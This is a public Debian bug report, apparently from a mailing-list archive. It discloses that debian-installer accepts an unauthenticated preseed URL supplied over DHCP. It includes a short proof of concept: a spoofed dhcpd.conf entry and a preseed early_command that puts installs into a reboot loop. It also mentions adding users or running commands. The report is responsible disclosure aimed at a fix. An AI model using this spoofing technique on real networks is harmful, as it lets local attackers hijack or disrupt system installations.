Package: debian-installer
Severity: important
Tags: d-i, security
Dear Maintainer,
I emailed the following to debian-security and was advised to open a public bug
for it.
Debian-installer will accept a preseed URL provided via a DHCP option, even
when installed from CD-ROM. No authentication of this parameter can be
performed, and the user is not prompted before it is accepted due to the nature
of preseeding. Due to this, an attacker on the local network can spoof a DHCP
responce pointing to their own preseed file, which can do all sorts of mischief
(such as adding users or executing commands).
An example:
in dhcpd.conf:
if substring(option vendor-class-identifier, 0, 3 = "d-i" { filename
"http://192.168.1.1/preseed.txt"; }
and in /var/www/preseed.txt:
d-i preseed/early_command string reboot
which will send the client into a reboot loop.
I'm not sure of the best way to mitigate this, without annoying people who use
this feature. Perhaps a kernel commandline arg to specifically enable preseed
via DHCP is a good idea? I understand that one expected use case is for an
administrator to specify an apt mirror via DHCP preseed, so that even users
installing from their own CD/DVD will pick it up, which would break in this
scenario.
-- System Information:
Debian Release: wheezy/sid
APT prefers precise-updates
APT policy: (500, 'precise-updates'), (500, 'precise-security'), (500,
'precise'), (100, 'precise-backports')
Architecture: amd64 (x86_64)
Kernel: Linux 3.11.0-15-generic (SMP w/1 CPU core)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
--
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
